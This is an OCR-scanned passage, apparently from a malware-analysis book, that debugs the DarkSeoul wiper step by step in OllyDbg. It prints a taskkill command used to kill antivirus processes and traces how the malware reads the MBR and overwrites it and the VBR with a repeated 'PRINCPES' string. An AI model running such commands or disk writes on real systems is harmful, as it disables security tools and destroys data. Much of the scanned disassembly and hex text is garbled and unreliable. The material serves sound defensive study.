0012FE48 FEFEFEEE | hFite = FRFEEFEE 
0012FE4C 00000000 | pSecurity = NULL 
0012FE50 00000004 | Protection = 

PAGE READWRITE 

0012FE54 00000000 | MaximumSizeHigh = 0 
0012FE58 00000010 | MaximumSizeLow = 10 
0012FE5C 00402991 \MapName = 
"J0840112-CRAS8468 - 11150923 -PCI8273V" 


In OllyDbg Handles View, we see the new section 
object created: 


Handles, item 10 

Handle=00000038 

Type=Section 

Refs= Sin 

Access=Q00F0007 
WRITE OWNER| WRITE DAC| READ CONTROL| DELETE 
| QUERY STATE| MODIFY STATE| 4 
Name=\BaseNamed0bjects\J0840112- 
CRAS8468 -11150923-PCI8273V 


Section objects are used to map a memory 
section as a file mapping object for data sharing 
a view of the file, especially between processes. 


Consult MSDN as and when required to get an 
idea of what the API calls are built to do, and 
develop context around it as well as obtain the 
finer points that might point toward incriminating 
evidence. In the following exhibit, the excerpt 
you are looking at is the CreateFileMapping 
function definition at MSDN: 


CreatehleMapping uncton 


Parameters 





For this particular variant, the purposes are not 
revealed as post-preparation of this object and its 
utility is never accessed throughout the code. 
Hence, this could either be a marker of some sort 
of a template code for future variants. 


Temp file check 


0040121C |. 8D8>LEA EAX,DWORD PTR SS: 


[EBP-10C] 

00401222 |. 5@ PUSH EAX 

00401223 |. FF9>CALL DWORD PTR DS: 
[ESI+3CC] ;shlwapi.PathFileExistsA 


This checks for the full path and proceed toward 
exiting if the log file is found. 


If it is not found, the following function is called 
taking ESI=internal function pointer table base 
address+ offset into the table reach. 


Taskkill invocation for antivirus 
services 


A service is a Windows program that runs without 
a user interface or interaction and is normally 
used for tasks that run in the background. They 
are controlled programmatically using Win32 APIs 
such as OpenScManager, CreateService, and 
StartService among others and are managed 
by the Service Control Manager component of the 
Windows OS. The user can interact with basic 
service controls using the net command. 


The interesting sequence is a regularly seen pre- 
payload where popular antivirus product services 
are terminated using the Windows taskkill 
command. For the sake of analogy, some 
malware also call User32.EndTask to achieve a 
similar effect as it closes the target window 
forcibly: 


004021B2 2 oo (PUSH ESI 

; DarkSeou.00402499 

004021B3 . 8B7>MOV ESI,DWORD PTR SS: 
[ESP+8] 

004021B7 2 of PUSH EDL 


004021B8 . 6A >PUSH 0 


004021BA 


[ESI+5B3] 


004021C0 


[ESI+394] 


004021C6 


004021C7 


004021C9 
004021CB 
004021D1 


004021D2 


004021D4 
004021D5 
004021D6 


. 8D8>LEA EAX,DWORD PTR DS: 


. 8DB>LEA EDI,DWORD PTR DS: 


. 50 PUSH EAX 


FF1>CALL DWORD PTR DS: [EDI] 


. 6A >PUSH 0 
. 81C>ADD EST,5CD 
«30 (PUSH EST 


FF1>CALL DWORD PTR DS: [EDI] 


oF (POP EDI 
ZEW PORES. 
.C3. RETN 


0x402499 is as uSual taken as the base at ESI 
and from there the two familiar strings are 
referenced; this kind of consistency is maintained 
throughout and makes our work easier, but 
always be on the lookout for changes during 
execution. 


Next: 


004021B8 
004021BA 


[ESI+5B3] 


004021C0 


[ESI+394] 


004021C6 


Register view: 


EAX 


00402A4C 


pasvc.exe" 


ECX 
EDX 
EBX 
ESP 
EBP 
EST 
EDI 


Next: 


0012FE1C 
7C90EB94 
00000000 
0012FE48 
0012FF78 
00402499 
0040282D 


. 6A >PUSH 0 
. 8D8>LEA EAX,DWORD PTR DS: 


. 8DB>LEA EDI,DWORD PTR DS: 


» 90° PUSH! EAX 


ASCII "taskkill /F /IM 


ntdll.KiFastSystemCallRet 


DarkSeou.00402499 
DarkSeou.0040282D 


004021C6 » 30) PUSH EAX 
004021C7 . FF1>CALL DWORD PTR DS: [EDI] 


kernel32.WinExec 
004021C9 . 6A >PUSH 0 


The WinExec() function is called to execute this 
command. 


Next: 


004021D1 200 IPUSH ESI 


DarkSeou.00402A66 
004021D2 . FF1>CALL DWORD PTR DS: [EDI] 
004021D4 -5F POP EDI 


EST=00402A66 (DarkSeou.00402A66), ASCII 
staskkaill fF 71M clasyc.exe= 


These are service names of AhnLab and Hauri 
antivirus services that are effectively shut down 
(/F forces the process to end, /IM passes the 
target image name) using the preceding 
commands, which is a self-defense measure so 
that the malware can continue running 
uninhibited. 


New thread creation 


Next we reach the CreateThread API call. In the 
following sequences, read the stack views, 
register values, and the parameters that are 
passed, confirm the API function signatures and 
expected values from MSDN, and form your 
theory of what it is doing at this point. What are 
the particular handle values referring to? 


Stack view: 


0012FE44 0040127A /CALL to 
CreateThread from DarkSeou.00401274 


0012FE48 00000000 | pSecurity 
O012FE4C 00000000 | StackSize 


NULL 
0 


0012FE50 00401AB9 | ThreadFunction = 
DarkSeou.00401AB9 

0012FE54 00402499 | pThreadParm = 
DarkSeou .00402499 

0012FE58 00000000 | CreationFlags = 0 
0012FE5C 0012FF80 \pThreadId = 


0012FF80 


0012FE60  6A4ABC5B 
0012FE64 = FFFFFFFF 


Next, in the new thread (there are a total of 2 
threads in the running process): 


00401AC8 
00401AC9 
[ESI+288] 


7 00° -PUSH EST 


FF9>CALL DWORD PTR DS: 


, 


DarkSeou.00401D72 


’ 


The preceding call address is responsible for 
drive traversal and infection. 


Physical drive number Processing: 


00401D72 /. 
00401D73 
00401D75 
00401D7B 
00401D7C 
00401D7D 
[EBP+8] 
00401D80 | 
00401D81 |. 
00401D83 |. 
4], EDI 
00401D86 |. 
[ESI+577] 
00401D8C | > 
00401D8D |. 
[ESI+28C] 
00401D93 | 
[ESP] ,104 


At this address: 


59° (PUSH EBP 


. 8BE>MOV EBP,ESP 

. 81E>SUB ESP,108 

x 03) (PUSH EBX 

~ 30 (PUSH EST 

. 8B7>MOV ESI,DWORD PTR SS: 


~ 07 (PUSH (EDA 


S3F>XOR EDI, EDL 
897>MOV DWORD PTR SS: [EBP- 


8D9>LEA EBX,DWORD PTR DS: 


56 /PUSH ESI 
FF9>| CALL DWORD PTR DS: 


. C70>| MOV DWORD PTR SS: 


00401D86 |. 8D9>LEA EBX,DWORD PTR DS: 
[ESI+577] 
00401D8C |> 56 /PUSH ESI 


Resulting Address=00402A10, (ASCII 
"\\.\PhysicalDrive%d" ) 


The preceding string is pushed as a parameter 


to: 


Next, 


00401D8D | . FF9>| CALL DWORD PTR DS: 
[ESI+28C] ; 
DarkSeou.00401E0A 

00401D93 |. C70>| MOV DWORD PTR SS: 
[ESP] ,104 


calls to memset (): 


OO9EFCD4 00401E32 /CALL to memset from 
DarkSeou.00401E2C 

OO9EFCD8 00402609 |s = 
DarkSeou.00402609 
OO9EFCDC 00000000 |c 
OO9EFCEO 00000010 \n 
OO9EFCE4 00000000 


00 
TOS ib.) 


Yet another: 


Next: 


OO9EFCC8 Q00401E3C /CALL to memset from 
DarkSeou.00401E36 

OO9EFCCC 00402649 |s = 
DarkSeou.00402649 

OO09EFCDO 00000000 |c = 00 

OO9EFCD4 00000010 \n 10 (16.) 
OO9EFCD8 00402609 DarkSeou.00402609 


00401DB9 | . 83C>| ADD ESP,18 
00401DBC |. 57 | PUSH EDI 
00401DBD |. 57 | PUSH EDI 
00401DBE |. 6A >| PUSH 3 
00401DCO |. 57 | PUSH EDI 
00401DC1 |. 6A >| PUSH 3 
00401DC3 |. 68 >| PUSH Co000000 


00401DC8 |. 8D8>| LEA EAX,DWORD PTR SS: 


[EBP-108] 

00401DCE |. 50 | PUSH EAX 

00401DCF | . FF9>| CALL DWORD PTR DS: 
[ESI+370] ;kernel32.CreateFileA 
00401DD5 |. 894>| MOV DWORD PTR DS: 


[ESI+40] , EAX 


With parameters: 


OO9EFCDC 00401DD5 /CALL to CreateFileA 
from DarkSeou.00401DCF 

OO9EFCEO OO9EFDO8 | FileName = 
"\\.\PhysicalDrived" 

QO9EFCE4 C0QQ00000 | Access = 
GENERIC READ| GENERIC WRITE 

OO9EFCE8 00000003 | ShareMode = 

FILE SHARE READ| FILE SHARE WRITE 
OO9EFCEC 00000000 | pSecurity = NULL 
OO9EFCFO 00000003 | Mode = 

OPEN EXISTING 

OO9EFCF4 00000000 | Attributes = 0 
OO9EFCF8 00000000 \hTemplateFile = 
NULL 

OO9EFCFC 00140000 


With the following in the handles table: 


Handles, item 5 

Handle=00000040 

Type=File (???) 

Refs= 2 

Access=0012019F 
SYNCHRONIZE] READ CONTROL| READ DATA| WRITE _ 
DATA| APPEND DATA] READ EA| WRITE EA| READ AT 
TRIBUTES| WRITE ATTRIBUTES 
Name=\Device\Harddisk0\DRO 


MBR reading 


00401DD5 |. 894>| MOV DWORD PTR DS: 
[ESI+40] , EAX 

00401DD8 |. 83F>| CMP EAX,-1 
00401DDB |. 74 >| JE SHORT 
DarkSeou.00401DF9 

00401DDD |. 56 | PUSH ESI 


00401DDE |. FF9>| CALL DWORD PTR DS: 


[ESI+290] ; 
DarkSeou.00401E4A 


Checks for valid handle to file object (drive) and 


calls 401E4A: 

Next: 
00401EDF |. FF77 >PUSH DWORD PTR DS: 
[EDI+40] 
00401EE2 |. FF97 >CALL DWORD PTR DS: 
[EDI+380] skernel32.SetFilePointer 


With parameters: 


OO09EFABO O0401EE8 /CALL to 
SetFilePointer from DarkSeou.  00401EE2 
OO9EFAB4 00000040 | hFile = 00000040 
(window) 

OO9EFAB8 00000000 | OffsetLo = 0 
OO9EFABC OO9EFADC | pOffsetHi = 
OO9EFADC 

OO9EFACO 00000000 \Origin = FILE BEGIN 


MBR reading code: 


00401EF2 |. 8D45 >LEA EAX,DWORD PTR SS: 
[EBP-4] 

Q0401EF5 |. 50 PUSH EAX 

00401EF6 | . 68 O0>PUSH 200 

00401EFB |. FF75 >PUSH DWORD PTR SS: 
[EBP+10] 

Q0401EFE |. FF77 >PUSH DWORD PTR DS: 
[EDI+40] 

00401F01 |. FF97 >CALL DWORD PTR DS: 
[EDI+390] ; 


kernel32.ReadFile 


OO9EFAAC 00401F07 /CALL to ReadFile 
from DarkSeou.00401F01 

OO9EFABO 00000040 | hFile = 00000040 
(window) 

OO9EFAB4 O09EFAFO | Buffer = Q09EFAFO 
OO9EFAB8 00000200 | BytesToRead = 200 
(S12) 

OO9EFABC O0O9EFACC | pBytesRead = 


OO9EFACC 
OO9EFACO 00000000 \pOverlapped = NULL 


(ilyOby = DarkSeou ODMBNDC36ATOABOO7ADSO1SASK2S1SCAeve= (CPU tread OOOO, module Dark Seay) 
Fit Yew Duy Pes Opts Ww. Hop 


aid oil Hb of annie) 


Bredged of ater M0) 


tht be. nto | Soe tl | th cunt" at i, 


The MBR is read from the disk. Exactly 512 bytes 
are read and the return value is 1 from 
ReadFile(). 





The end marker of 0x55AA for MBRs is not shown 
in the exhibit as it is right after the displayed 
dump. 


Next: 





OO401E5F |. 50 PUSH EAX 

00401E60 |. 33DB XOR EBX,EBX 

00401E62 |. 53 PUSH EBX 
lle: 
le 


00401E63 56 PUSH ESI 

00401E64 891E MOV DWORD PTR DS: 
LEST] EBX. 

00401E66 |. FF96 >CALL DWORD PTR DS: 
[ESI+294] 

O0401E6C |. 83C4 >ADD ESP,0C 


Parameters on stack: 


OO9EFAD4 00401EA8 /CALL to memcpy from 
DarkSeou.00401EA2 

QOO9EFAD8 00402609 | dest = 

DarkSeou .00402609 

QOOS9EFADC OO9EFCAE | src = OO9EFCAE 
OO9EFAEO 00000010 \n = 10 (16.) 


16 bytes are copied. 


00402609 80 01 01 00 07 FE F8 FF 38 00 
0000 30 BD FF QA0 fica ann Sieemeceetne 


The preceding hex bytes could be a marker, 
though you are encouraged to analyze this part 
on your own. 


Next: 


Next: 


00401DE9 |. 56 (/PUSH EST 
00401DEA |. FF96 >| CALL DWORD PTR DS: 
[ESI+29C] ; 


DarkSeou.00401FB4 


0040202E |. 50 PUSH EAX 

0040202F |. FF96 >CALL DWORD PTR DS: 
[ESI+3BC] 

00402035 |. 68 O0>PUSH 200 

0040203A |. 8D85 >LEA EAX,DWORD PTR SS: 


[EBP-20C] 


Parameters: 


OO9EFAA4 00402035 /CALL to sprintf 
from DarkSeou.0040202F 

OO9EFAA8 QO9EFCCC |s = QQ9EFCCC 
OO9EFAAC 00402A24 | format = "%s" 
OO9EFABO 004029B5 \<%s> = "PRINCPES" 


4 > 


First instance of PRINCPES is written at: 


(MlyDbg- DarkSeoul DOSBODCIOA7OANOO7AD4O1SASH2S1SC eve = [CPU thread 0000009, module DarkSeou) 


Hedger Dae MOS 








Next, a call to memset with stack parameters: 


OO9EFA98 00402048 /CALL to memset from 
DarkSeou.00402042 

OO9EFA9C OO9EFACC |s OO9EFACC 
OO9EFAAO 00000000 |c = 00 

OO9EFAA4 00000200 \n 200 (512.) 


0x200 or 512 in decimal is a significant number 
for our analysis as the MBR size is 512 bytes for 
Windows XP. On execution, in recent OS versions, 
the MBR size varies to 1023, which is upto the 
reader to further research and document. 


Moving to: 


0040204E | > 8D45 >/LEA EAX,DWORD PTR SS: 


[EBP-C] 

00402051 |. 50 | PUSH EAX 

00402052 |. FF96 >| CALL DWORD PTR DS: 
[ESI+3B8] 

00402058 |. 50 | PUSH EAX 

00402059 |. 8D45 >| LEA EAX,DWORD PTR SS: 
[EBP-C] 

0040205C |. 50 | PUSH EAX 

0040205D |. 8D843>| LEA EAX,DWORD PTR SS: 
[EBP+EDI -20C 

00402064 |. 50 | PUSH EAX 

00402065 |. FF96 >| CALL DWORD PTR DS: 
[ESI+3B4] ; 

msvcrt.memcpy 

0040206B |. 8D45 >| LEA EAX,DWORD PTR SS: 
[EBP-C] 


The following code copies the string: 


0040204E | > 8D45 >/LEA EAX,DWORD PTR SS: 


[EBP-C] 

00402051 |. 50 | PUSH EAX 

00402052 |. FF96 >| CALL DWORD PTR DS: 
[ESI+3B8] 

00402058 |. 50 | PUSH EAX 

00402059 |. 8D45 >| LEA EAX,DWORD PTR SS: 
[EBP-C] 

0040205C |. 50 | PUSH EAX 

0040205D |. 8D843>| LEA EAX,DWORD PTR SS: 
[EBP+EDI -20C] 

00402064 |. 50 | PUSH EAX 


00402065 |. FF96 >| CALL DWORD PTR DS: 


AS: 


[ESI+3B4] 
0040206B 
[EBP-C] 
0040206E 
0040206F 
[ESI+3B8] 
00402075 
00402078 
0040207A 
0040207B 
DarkSeou 


OO9EFACC 
49 4E 43 
OO9EFADC 
49 4E 43 
OO9EFAEC 
49 4E 43 
OO9EFAFC 
49 4E 43 
OO9EFBOC 
49 4E 43 
OO9EFBIC 
49 4E 43 
OO9EFB2C 
49 4E 43 
OO9EFB3C 
49 4E 43 
OO9EFB4C 
49 4E 43 
OO9EFB5C 
49 4E 43 
OO9EFB6C 
49 4E 43 
OO9EFB7C 
49 4E 43 
OO9EFB8C 
49 4E 43 
OO9EFB9C 
49 4E 43 
OO9EFBAC 
49 4E 43 
OO9EFBBC 
49 4E 43 
OO9EFBCC 
49 4E 43 
OO9EFBDC 
49 4E 43 
OO9EFBEC 


| . 8D45 >| LEA EAX,DWORD PTR 

|. 50 | PUSH EAX 

| . FF96 >| CALL DWORD PTR DS: 

| . 83C4 >| ADD ESP, 14 

| . 03F8 | ADD EDI,EAX 

|< 48 | BEC EBx 

| .°75 D1 \JNZ SHORT 
.0040204E 

50 52 49 4E 43 50 45 53 50 

50 45 53. PRINCPESPRINCPES 


50 52 49 4E 45 50) 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50° 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50 45 53 50 


50-45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50°45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50) 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50: 45, 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50: 45 53 30 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435 50 45 53 50 


50°45 53 (PRINCPESPRINCPES 


50 52 49 4E 435 50 45 53 50 


50°45 53 PRINCPESPRINCPES 


5052 49 4E 435 50) 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50° 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 435° 50) 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50: 45, 53 50 


5045 53 PRINCPESPRINCPES 


50 52 40 4E 45 50) 45 53 50 


50 45 53 PRINCPESPRINCPES 


50 52 49 4E 45 50: 45 53 50 


50°45 53 PRINCPESPRINCPES 


50°52 49 4E 45° 50 45 53 50. 


Sor 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


49 4E 43 
OO9EFBFC 
49 4E 43 
OO9EFCOC 
49 4E 43 
OO9EFCIC 
49 4E 43 
OO9EFC2C 
49 4E 43 
OO9EFC3C 
49 4E 43 
OO9EFC4C 
49 4E 43 
OO9EFC5C 
49 4E 43 
OO9EFC6C 
49 4E 43 
OO9EFC7C 
49 4E 43 
OO9EFC8C 
49 4E 43 
OO9EFCIC 
49 4E 43 


50 45 53  PRINCPESPRINCPES 
50 52 49-4E 435 50.45 53 50 
50 45 53 PRINCPESPRINCPES 
50: 52 49 4E 435 50°45 53 50 
50 45 53 PRINCPESPRINCPES 
50 52 49° 4E 43 50 45 53 50 
50 45 53 PRINCPESPRINCPES 
50 52 49 46 45'500 45 53° 50. 
50 45 53 PRINCPESPRINCPES 
50 52 49°4E 43 50-45. 53 50 
50 45 53 PRINCPESPRINCPES 
50:52 49 4E 435° 50°45 33:50. 
50 45 53° PRINCPESPRINCPES 
50 52 40: 4E 435 50° 45 53 50 
50 45 53 PRINCPESPRINCPES 
50 52 49 464355045 33° 50: 
50 45 53 PRINCPESPRINCPES 
50 52 49° 4E 43 50.45 53 50 
50 45 53, PRINCPESPRINCPES 
50: 52 49 4E 435 50°45 53. 50 
50 45 53 PRINCPESPRINCPES 
50 52 49° 4E 43 50 45, 53 50 
50 45 53 PRINCPESPRINCPES 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


52 


(ilyDbg  DarkSeoul_ODYBODCSOATOANOO7ADYO1SASG251SC4.eve = (CPU thread 0000009, module Dark Seou} 
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Thus, at this point, we see how the new MBR is 
being built before being dumped in the real OS 
MBR in the coming call sequences. 








MBR infection 


Next: 
00402083 |. 50 PUSH EAX 
00402084 |. FF75 >PUSH DWORD PTR SS: 
[EBP+C] 
00402087 |. 56 PUSH ESI 
00402088 |. FF96 >CALL DWORD PTR DS: 
[ESI+2A4]; 


DarkSeou.00402096 


Through: 


00402084 
004020B5 
004020B8 
004020B9 
[EDI+40] 
004020BC 


[EDI+380]; 


~ oO PUSH EAX 

2 CEG SSH ESE, 9 

eee) PUSH ESI 

FF77 >PUSH DWORD PTR DS: 


FF97 >CALL DWORD PTR DS: 


kernel32.SetFilePointer 


With parameters in stack: 


OO9EFA8C 


004020C2 /CALL to 


SetFilePointer from DarkSeou.004020BC 


O009EFA90 
(window) 
OO9EFA94 
(28672. ) 
O09EFA98 
OO9EFAB8 
OO9EFA9IC 


00000040 | hFile = 00000040 
00007000 | OffsetLo = 7000 
OO9EFAB8 | pOffsetHi = 


00000000 \Origin = FILE BEGIN 


Note that, EAX=7000 at this point. This is 
significant as this is the offset of the logical 
volume boot record for the C:\ drive in the VM XP 
installation in our setup. 


Payload 


Payload code region: 


004020CA 
004020CC 
[EBP-4] 

004020CF 
004020D0 
004020D5 
[EBP+10] 
004020D8 
[EDI+40] 
004020DB 


[EDI+374]; 


| > 6A 00 PUSH 0 


8D45 >LEA EAX,DWORD PTR SS: 
OU PUSH EAX 

. 68 Q0>PUSH 200 

FF75 >PUSH DWORD PTR SS: 
FF77 >PUSH DWORD PTR DS: 


FF97 >CALL DWORD PTR DS: 


kernel32.WriteFile 


With parameters: 


OO09EFA88 004020E1 /CALL to WriteFile 
from DarkSeou.004020DB 

OO9EFA8C 00000040 | hFile = 00000040 
(window) 

OO09EFA90 OO9EFACC | Buffer = Q09EFACC 
OO9EFA94 00000200 | nBytesToWrite = 200 
(512°. ) 

OO9EFAI8 OO9EFAA8 | pBytesWritten 
OO9EFAA8 

OO9EFA9C 00000000 \pOverlapped = NULL 


Note that other techniques for MBR overwriting 
exist, for instance successive multiple calls to 
DeviceIoControlFile can perform the same 
write operation to a disk entity. 


Memory dump view (right-click on the stack 
‘Buffer’ argument value and choose Follow in 
dump to get the memory view displaying from 
that address. Very useful in quick and dirty 
discovery and potential memory carving (binary 
copy and paste) of executables and interesting 
binary patterns as well as strings in memory): 


QOSEFACC 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
OO9EFADC 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
QOSEFAEC 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
QOSEFAFC 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
OOSEFBOC 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
QOOSEFBIC 50°52 49 4E 43 50 45 55 50 52 
49 4E 43 50 45 53 PRINCPESPRINCPES 
OOSEFB2C 50°52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 
OOSEFB3C 50 52 49 4E 43 50 45 53 50 52 
49 4E 43 50 45 53. PRINCPESPRINCPES 


Handle table as following exhibit at the current 
stage in execution; always keep checking your 
current status: 


CtyDbg = DarkSeoul DOSBODCIGATOAQOO7AD4O1SASG2S15C4,eve = Handles) 
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Verifying MBR integrity 


You can use WinHex to verify the partition record 
overwrites. 














Uren (Nard dk 0} “aly 
Fle Ed Saath Nin To Spit Ops Wn top fhe 6) 
DJ beds OR UR HARLEY de> oyompee AN O 
fe snd 
Paving si ER (WO pat 
Ne th Soe Coded odd Pao At, Sacto 
“Fat ( WIS GH Fi 
Sie ace 10M) hIGs, 
Utne 1308 Inia 
ott (OLDIES ET OTL E CDE TAD ; 
000000000 $9 CD BE DO BC O0 70 FB SO 07 SO AF FC BE 4B 7C SAdDM JAP P WW | tad 
(000000010 HF 1B 06 $0 $7 89 ES OL FY AN CB BD AE C7 B01 ¢ PVA QHD Wd Wha il 
ONNOONLD 38 6 00 C08 75:13 63 CS 10 E2 F418 QB FS Gn | u fh bi vd frase iy 
nnn |e) C6 10491 8 AC AD OTK OBB ABT tow iy Yih 
OQOOOOOOHD TO AC HC OO 74 C BB OT 00 B4 OE CD 10 OB #2 8B dsc th» ‘Tab’ 
(000000050 42 10 28 46 00°73 2A FE 46-10 00 TE 04 OB 74 OB NAP stp et Dal Ele 
QOOO000060 G0 TE O4 OC 14-05 10 BE 07 75-02 60.45 02 06 83 tt Quler f Sie ign 
QQOO000NTO 46 OB OF BD 56 OL 00 EE 21.0071 OS 40 DSO ERT WV ela Ge lied ' 
ttt | OL SEM 8 Ak 4 O86 M10 00 4 CHAO MOM + tt aaa th 
QQO0000080 ¥7 07 HB Ag AB AC AE ST SB FS-CB AT OS OO BN S6 + UU WAL) 
OOOOUOOOND |00-B4 08 CD 19-72-29 Oh C1 24-97 98 OL BE Ok RC rAbltrtpsi Teloycy 408 
OOOOO00OBO 43 F723 BB DL 6 D6 BL 06 B2 BE 42 #7 22 99 56 CobcNOe OBs4aV MUMIA je 
Won OL 728 059-4 OB TC OKO WOU we BP, | Wine P 
Uontnnd tote SO Ch AD 1 LAF T4 A tH aL Eee teniniet 
000000080 $6 OO CD 19 BAY BA $6 00 60 BB AL SE D4 41 CD VT dABV ‘vAD'at 
OQOO0000R0 19 72-96 BL FD$5 AA 15. 90-76-61 01 74 OB 61 60 rAOHOuObd tin’ Palo 4 
000000400 fh OO Gh OO FT 76 OL FF 16-08 64 00 68 00 TC Sh J J IY BI) Adel nh 
000000110 O1 Gh 104 42 O04 CO 19 61 61 70 OL AP-14 OB 4 ‘MOL ans Ot 
OQO0O0OL20 $0 £4 BN $6 00 CD 19 EB D6 GL F9-C3 49 OE 76 61 248Y f ebulrva Ved hon 
000000130. 6C 49 64 QO 10-61 22-14 69-74-69 AP OE 20 74 GL Lid pantition ta Chaat AIA 
OQOOO0OL40 62 66 68 0 45 12-72 GE 12-20-66 AP AL O4 69 OE ble decor loadin Ota heen 
OOONOOISO 67 20 AF 10 65 72 61 TA 69 GE 6? 20°73 79 72 TE g operating apst Qanpnnaye Bilal 
0000000160 65 6D 00 4D 69 7373 69 OL 67 20 GF 70 65 12 GL em Missing opera Wed | 
QQOOO0OYTO 74 49 AE 67 2073-79-73. TH ES 6D CO OD OO 00 OO tiny apace inlining 1 
(000000480 00 00 OO 00 00 00.00 00 00 00 00 GO Od od 00 00 
000000180 00 OD O0 OD 00 0 00 00 00 00 0D oO OD Od 0d 00 tn EEE 4 
: peal ans 
Soto tht t ok th Se yng ae 


| tye | a tht | oe, | Ys | ita, ed 


Start sectors are not yet infected in the 
preceding exhibit. 
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Offset | 01094567 OOM se ‘ in 
tuoonee fb 49 AE 43 9045 $3 $0 $2 49 AE 43 $0 45 89. PRINCPLSPRINCPES Haddekd 


00000028688) $0 $2 49 4E 43 $0 45 53 $0 $2 49 4E 43 50 45 5) PRINCPESPRIICPES Wt Mowe Me itu 


00000028704 $0 $2 49 AE A) $0 45 $3 $0 $2 49 AE 49 $0 45 $3 PRINGPESPRINGDES Fianat ey {0 
00000028720) $0 $2 49 4E 43 $0 45 53 $0 $2 49 4E 43 5045 53 PRINCPESPRICPES tu sul 
OQO0002E796| $0 $2 49 AE 4) 90 45 8) $0 $2 49-48 4) $0 45 8) PRINCPESPRINGPES 


00000028782 $0 52.49 4E 49 $0.45 53 $0 $2 49.4L 43 5045 5) PRINCPESPRINCPES DotA 








00000028768} $0 $2 49 AE 4) $0 45 $3 $0 82 49-42 4) $0 45 $3 PRINCPESPRINCPES — Sida ig 
00000028764) $0 $2.49 ME 49 $0 45 $9 $0 $2 49 AE 43 $045 89 PRINCPESPRINDES Unb 1 
00000028800 $0 $2 49 4E 49 $0 45 53 50 $2 49 4E 43 5045 53 PRINCPESPRIKCPES ihe th 
OO000028816 $0 $2 49 AE A) $0 45 $3 $0 $2 49 AE 49 $0 45 §) PRINGPESPRINGDES 
00000026882) $0 $2 4B AE 4D $0 45 $9 50 $2 49 40 4) $0 45 53. PRINCPESPRINCPES Tf tT) 
OO000020048 $0 $2 49 AE 4) $0 45 $) $0 $2 49 AE 4) $0 45 §) PRINCPESPRINCDES SHS Ab et 
00000028664) $0 $2.49 4E 43 $0.45 $3 $0 $2 49 AE 43 5045 59 PRINCPESPRINDES Woven i 
00000028080) $0 $2 49 4E 49 $0 45 5) $0 $2 49 4E 43 5045 $3 PRINCPESPRIVES Sdn ded 4H 
0000026896 $0 $2 49 AE 43 $0 45 $3 $0 $2 49 AE 4) $0 45 $3 PRINGPESPRINCDES 
00000028842) $0 $2 49 AE 4) $0 45 $3 80 $2 49 AE 4) SO 45 $3 PRINCPESPRINCPES Pliny | 
00000020828 $0 $2 49 AE A) $0 45 $3 $0 $2 49 AE 4) $0 45 5) PRINCPESPRINCPES diay lg: 
00000028944 $0 52.49 4E 43 $0.45 53 $0 $2 49 4E 43 5045 5) PRINCPESPRIICPES 
00000960 $0 $2 49 AE 4) $0 45-5) $0.50 49 48 4) 9045 59 PRINCPESPRICPES Mak tea 
OnnOO2E915 80 $2 49 AE 4) $045 $3.90 82 49 E43 5045 8} pnuncersmamncees — Ouactat AAO 
0000000090 $0 52 49 4E 4) $0 45 5). 50.50 49 4E 4) 9045 5) pamncpespnmcs Oa acd 
ononn2908 go $2 9 aL A) $045 $3. $082 40 aE 4b $0 45 8} pnuncresnancees jennie ‘het 
JOon0doggde) $0 $2 49 ME 4 $0 45 $) $0 82 49 AE 4} SO 45 5). PRINCPESPRINPES Wah 1 
0000009040 $0 $2 AB AE AY $0 45 $9 50 $2 49 ME AB $0 45 $3 PRINGPESPRINGPES gue | 
00000029056) $0 $2 49 4 43 $0 45 53 $0 $2 49 4E 43 50 45 53 PRINCPESPRINES 
00000RBBUNE| SO $2 4B AE AY $0 45 $9 $0.82 49 AE 49 $0 48 59 PRINCPESPRINGHES Opa in i walt 
00000029088) $0 $2 49 4E 43 $0 45 $3 $0 $2 49 AE 43 $045 59 PRINCPESPRINES A76im 
(NINN AMMA AI Tan 
Seo cl 68 Ot iui Na See Mt 

















C:\ VBR (Volume Boot Record) is overwritten. 


In the next infection cycle, start sectors are also 
infected, as shown in the following screenshot: 
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Utne 1308 Inisa0 
tie OL T1456) OSOUN NH A { ied 
ontop 8249 9045 $3 908249 aE 0458) fNMOKMS I] aig 
HU 249 4S 5045S) 50S 84 04 SARIS Won sta 
onc 082494 945 $3 9082 494 ASS) PROPSPOKS \j 
DODO 5 044 0455350529404) 5 8) PAOKPORONNS sue 
OUDNO000H $0 $2 49 4B 49 $048 $9 90 $2 49 ME 4) $048 81. PRINCRSHRUNES 
onngoao0 $0 $2 49 AE 4) $045 S350 82 49 MEA) 5045 8} PRONCPESPRONCPES Dy 
OOONOOOOGE SO 2 48 4B 40 $0 45S) $0 52 49 4 41 $0 45 5) PRINCPRSPRINCRES. Say cid 
own 0S 8 YS 60S 9A SASS) OES ' 
oun 0S 48 1556) 50 S49 4) 5455) OONES ‘4 
OUOOO0014 $0 $2 49 AE 4) $048 $3. 9082 49 ME 4) $048 8). PRINCRSHRUNES 
OUOOOO4E0 8082 49 AEA) 8045 5) 590 5249 AE 40 0 4559 PRONCHEPRONCHES ep mn 
QOOO00194 SO S49 4B 4) $045) $0 52 49 AE 4b $0 45 59. PRINCPSPRINCHES rr) 
ron DL BAAS) LAS MOOS A r 
nan 8.4944) 0458) 8 ALAS Mm 
